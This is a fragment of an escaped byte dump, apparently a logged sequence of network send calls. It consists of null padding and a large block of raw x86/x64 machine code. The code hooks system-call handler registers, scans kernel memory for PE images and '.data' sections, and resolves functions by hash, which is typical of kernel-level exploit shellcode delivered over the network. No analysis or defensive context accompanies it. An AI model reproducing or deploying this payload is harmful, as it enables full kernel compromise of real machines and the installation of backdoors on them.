\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 13, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x